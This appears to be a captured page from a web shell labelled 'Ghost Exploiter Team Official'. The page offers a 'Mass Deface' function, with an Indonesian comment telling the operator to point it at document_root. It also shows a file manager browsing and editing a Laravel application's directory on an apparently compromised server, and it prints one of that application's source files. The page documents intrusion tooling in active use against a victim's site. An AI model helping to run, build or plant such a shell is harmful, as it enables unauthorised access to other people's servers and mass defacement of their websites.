Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
app
/
Domain
/
Users
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
AppServiceProvider.php
0.787KB
edt
ren
AuthService.php
0KB
edt
ren
CashFlowService.php
58.276KB
edt
ren
Dto.php
0KB
edt
ren
FailedValidationExcepti
...
0.988KB
edt
ren
MessageResponse.php
1.271KB
edt
ren
PaginationDto.php
0.244KB
edt
ren
TokenResponse.php
0KB
edt
ren
UserService.php
0.767KB
edt
ren
api.php
0KB
edt
ren
auth-20260128142238.php
0KB
edt
ren
auth.php
0KB
edt
ren
cache.php
3.395KB
edt
ren
debugbar.php
13.946KB
edt
ren
services-20260128142452
...
0KB
edt
ren
services.php
0KB
edt
ren
users-20260128133906.php
0.828KB
edt
ren
users.php
0.828KB
edt
ren
<?php declare(strict_types=1); namespace App\Responses; use Illuminate\Contracts\Support\Responsable; use Illuminate\Http\{JsonResponse, Response}; use Illuminate\Support\MessageBag; final readonly class FailedValidationExceptionResponse implements Responsable { private MessageBag $errors; public function __construct(MessageBag $errors) { $this->errors = $errors; } public function toResponse($request): JsonResponse { return new JsonResponse( data: [ 'status' => Response::HTTP_UNPROCESSABLE_ENTITY, 'data' => [ 'message' => __(key: 'Ошибка валидации!'), 'errors' => $this->errors ], 'metadata' => [ 'request_id' => str()->uuid()->toString(), 'timestamp' => now()->toIso8601String() ], ], status: Response::HTTP_UNPROCESSABLE_ENTITY ); } }
<=Back
Liking